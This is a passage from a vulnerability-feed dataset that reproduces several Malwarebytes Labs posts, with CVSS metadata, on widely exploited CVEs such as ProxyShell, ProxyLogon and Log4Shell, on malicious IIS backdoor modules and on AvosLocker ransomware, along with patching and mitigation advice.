Code Execurion (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. Exploitation of these [VMware vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns>) began in early 2022 and attempts continued throughout the remainder of the year.\n * [CVE-2022-26134](<https://vulners.com/cve/CVE-2022-26134>) is a critical RCE vulnerability that affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (see CVE-2021-26084 above), which cyber actors also exploited in 2022.\n * [CVE-2022-1388](<https://vulners.com/cve/CVE-2022-1388>) is a vulnerability in the F5 [BIG IP platform](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>) that allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n * [CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>), aka [Follina](<https://www.malwarebytes.com/blog/news/2022/06/faq-mitigating-microsoft-offices-follina-zero-day>), is a Microsoft Windows Support Diagnostic Tool RCE vulnerability. An attacker can send you a malicious Office document that will compromise your machine with malware when you open it.\n\nSo I was hoping we can strike a deal. I'll check next year how well this prediction does and you all patch these vulnerabilities real quick, so I can write about some new ones next year.\n\n* * *\n\n**We don't just report on vulnerabilities--we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [Malwarebytes Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-07T18:30:00", "type": "malwarebytes", "title": "2022's most routinely exploited vulnerabilities\u2014history repeats", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-07T18:30:00", "id": "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "href": "https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34523, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetiPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several thing you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service it may depend on the affiliate which of the vulnerabilities gets used.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you 